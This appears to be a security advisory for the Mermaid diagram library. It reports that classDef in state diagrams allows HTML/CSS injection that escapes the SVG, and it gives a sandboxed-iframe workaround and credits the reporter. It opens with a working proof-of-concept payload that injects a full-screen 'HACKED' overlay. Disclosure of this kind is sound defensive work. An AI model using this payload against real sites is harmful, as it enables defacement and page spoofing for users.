stateDiagram-v2
classDef xss fill:red</style></svg><style>*{x:x;y:y;overflow:visible!important;contain:none!important;transform:none!important;filter:none!important;clip-path:none!important}</style><div style="x:x;y:y;color:red;font:5em/1 monospace;display:grid;place-items:center;z-index:2147483647;width:100vw;height:100vh;position:fixed;top:0;left:0;background:black">HACKED</div><svg><style>a:b
[*] --> A:::xss
Impact
Under the default configuration, Mermaid state diagram's
classDefallow DOM injection that escapes the SVG, although<script>tags are removed, preventing XSS.Proof-of-concept
Patches
Workarounds
If you can not update to a patched version, setting
"securityLevel": "sandbox"will prevent this, by rendering the mermaid diagram in a sandboxed<iframe>.Credits
Thanks to @zsxsoft from @KeenSecurityLab for reporting this vulnerability.